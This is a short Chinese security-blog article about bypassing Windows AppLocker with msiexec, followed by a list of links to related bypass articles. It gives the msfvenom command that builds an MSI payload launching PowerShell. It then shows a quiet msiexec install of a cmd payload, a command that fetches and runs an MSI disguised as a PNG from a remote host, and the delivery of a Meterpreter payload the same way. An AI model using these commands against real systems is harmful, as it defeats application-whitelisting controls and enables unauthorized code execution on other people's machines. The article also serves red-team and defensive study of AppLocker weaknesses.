绕过AppLocker系列之MSIEXEC的利用

简介: 本文讲的是绕过AppLocker系列之MSIEXEC的利用,MSIEXEC是Windows操作系统中的一个实用程序,可用于从命令行安装或配置产品。 如果环境配置不正确,则使用.MSI文件就可以允许攻击者执行权限升级或绕过AppLocker规则。
本文讲的是 绕过AppLocker系列之MSIEXEC的利用MSIEXEC是Windows操作系统中的一个实用程序,可用于从命令行安装或配置产品。 如果环境配置不正确,则使用.MSI文件就可以允许攻击者执行权限升级或绕过AppLocker规则。 本文的以下内容表明,当系统配置为不阻止所有用户执行MSI文件时,那么系统就得不到正确的保护,因为任何一个AppLocker的可执行规则都可以轻松绕过。

可以使用Metasploit 的MsfVenom来生成用于执行命令或有效载荷的.MSI文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes

绕过AppLocker系列之MSIEXEC的利用

使用 MsfVenom 生成 MSI 文件 

运行powershell.msi 将会打开一个PowerShell会话,这样就可以绕过AppLocker的规则了,即使已经设置了所有用户都不可以执行PowerShell。

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC 运行 PowerShell

同样可以利用这种方式运行cmd命令,即使Windows系统已经阻止了cmd命令的执行。

msiexec /quiet /i cmd.msi

绕过AppLocker系列之MSIEXEC的利用

执行上述命令后,就会弹出cmd的窗口。

绕过AppLocker系列之MSIEXEC的利用

另外,msiexec实用程序还可以运行已经重命名过的MSI文件,比如重命名为PNG的MSI文件。 这些文件可以在命令提示符中本地执行或从远程执行,当然也可以绕过AppLocker规则执行。

msiexec /q /i http://192.168.100.3/tmp/cmd.png

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC执行PNG文件,弹出cmd

上述操作同样可以用在Meterpreter payload 执行MSI文件上。

绕过AppLocker系列之MSIEXEC的利用

利用MSI 执行 Meterpreter Payload

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC获得Meterpreter 会话




原文发布时间为:2017年6月22日
本文作者:丝绸之路 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
8月前
|
安全 API 网络安全
绕过IIS命令执行防护提权
绕过IIS命令执行防护提权
78 0
|
8月前
|
开发框架 安全 .NET
记一次绕过安全狗和360提权案例
记一次绕过安全狗和360提权案例
95 0
|
安全 Ubuntu Shell
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
PHP Serverless
各种绕过
各种绕过 110 各种绕过哟http://120.24.86.145:8002/web7/ get 接收 id 和 uname post 接收 passwd sha1() 函数计算字符串的 SHA-1 散列 根据函数性质,嗯,又是构造数组就好...
1006 0
|
API Windows 安全
绕过AppLocker系列之CreateRestrictedToken的利用
本文讲的是绕过AppLocker系列之CreateRestrictedToken的利用,大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。
1597 0
|
C#
绕过AppLocker系列之Regasm和Regsvcs的利用
本文讲的是绕过AppLocker系列之Regasm和Regsvcs的利用,Regasm和Regsvcs都是用于向COM对象注册程序集文件的Microsoft二进制文件。 这些二进制文件可以在.NET框架中找到,并且由于它们是可信的,所以这两个Microsoft实用程序可以用于绕过AppLocker限制和执行任意代码。
1049 0
|
Windows
如何绕过应用白名单和受限的 PowerShell?
本文讲的是如何绕过应用白名单和受限的 PowerShell?,最近几年,关于如何绕过应用程序白名单的研究非常火热,Casey Smith(@subtee)和Matt Graeber(@mattifestation)都有过这方面的研究,他们最新研究成果就是“应用程序白名单必须被锁定
2243 0